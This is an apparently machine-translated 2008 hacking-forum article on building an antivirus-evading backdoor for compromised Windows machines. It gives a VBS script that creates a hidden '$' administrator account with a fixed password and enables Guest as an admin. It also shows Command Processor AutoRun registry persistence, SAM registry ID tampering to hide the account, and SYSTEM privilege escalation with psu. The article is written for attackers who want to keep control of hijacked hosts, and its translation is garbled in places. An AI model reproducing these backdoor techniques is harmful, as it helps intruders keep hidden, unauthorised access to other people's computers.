The decomposition of the back door to check the heart-to build antivirus PASS Backdoor-vulnerability warning-the black bar safety net

2008-07-28T00:00:00
ID MYHACK58:62200819847
Type myhack58
Reporter 佚名
Modified 2008-07-28T00:00:00

Description

|

In the security concept of growing today, want to get a station of their own chickens is easy, if say because the administrator found himself left in the broiler on the back door account and lead to broiler missing words, that is the world the most painful thing, I believe everyone will not want this to happen in their own body! This time with what back door to control the broiler will become the most headache problem, and after a good


Superdoor3. 0 This software we have ever used or heard of? It is only one executable program, the file itself is small, the command simple. After running, you can play to the hidden account of the effect, the administrator in the CMD with the“net user”to see User Accounts or Computer Management to maintain the user account, the Account will be automatically hidden. Using the method is also particularly simple, you only need to type the following command line: door <username>:<password> Tip: Superdoor3. 0(Super back door 3. 0), the super user is hidden. Operating environment: test 2 0 0 0 by the required VB run libraries. Method of operation: door <user>:<password>example: administrator:1 2 3 in. Function: it in the open“Computer Management”and CMD when the user deleted, the administrator to see the user, close the“Computer Management”or CMD, the user is back and skillfully dodged the Administrator's view, is the Baoji essential medicine.

But use this Backdoor to establish a hidden account is easy, the back door was found is also very easy. I use antivirus software(Norton Anti Virus)search a bit. In/winnt/system32/the following will generate a Cmd. exe file and infected Conpmgmt. exe file.

Hey, it seems Superdoor have long been included in the antivirus list. And in antivirus the backdoors removed, and then run the CMD command line return on top of it more than the sentence:“c:\WINNT\system32\crnd.exe"not external or internal command, nor operable program or batch file.”

It seems the file associated with the passive the hands and feet. After the Find, the discovery program writes the following two key values: The HKEY_LOCAL_MACHINE and the HKEY_CURRENT_USER\Software\Microsoft\Command Processor\Auto Run First look at these two positions: if/D is not on the command line is specified, when the Cmd. exe is running, it will automatically look for the following Reg_sz/reg_expand_sz registry variables. If one or two are present, these two variables will first be implemented. That is, as long as the startup. CMD will run the above script, can be said that the CMD associated with it.

Achieve“account if the is removed, run CMD and restored”effect, the principle is such. Now let us according to the principle of Do not kill the back door. First establish a name to RUN the VBS File, Save in C:/winnt/system32/, content as follows: dim wsh set wsh=CreateObject("WScript. Shell") wsh. run "net user hsmw$ QQ26836659",0 wsh. run "net localgroup administrators hsmw$ /add",0 wsh. run "net user guest /active:yes",0 wsh. run "net user guest QQ26836659",0 wsh. run "net localgroup administrators hsmw$ /add",0 Above a period of VBS meant to establish a hsmw$account, and add to the senior management group, set a password for QQ26836659, activate the Guest account, and add to the senior management group, set a password for QQ26836659 it. Write to the registry in the following keys, associated with CMD to achieve the undead effect: HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\Auto Run HKEY_CURRENT_USER\Software\Microsoft\Command Processor\Auto Run

Small tip: in the account later added a$is in order to input“net user”is not easily found, though, is a“no dead accounts”, but in Computer Management can be easily found.

We have added, for example,“?$$” Such account is later found in the registry that have the character“$account”corresponding to the ID value, the specific position at: KEY_LOCAL_MACHINE\SAM\SAM\ Domains\Account\User There will be a character$account corresponding to the ID of the key to modify the value of a non-existent ID key value. For example: a account of the key value 0x4eb, modify 0x6eb, then this contains the characters$Account No ID, and after reboot, the user administration interface where you can't see this account! Here note that to open the registry in the SAM requires System permissions, Admin permissions is not enough, but don't hurry. Here we can use a Psu of this software to easily elevate privileges, first with Pslist to view the Winlogon. exe PID value of 2 1 2, and then input“Psu-p-regedit-i 2 1 2”on it.

Well, in front of the VBS function in the CMD using“net user command”invisible, the latter of which is in Computer Management in the unseen, combined with a new back door born, with antivirus software to check: to PASS on! Ha ha, success! There are shortcomings, also please enlighten me, thank you!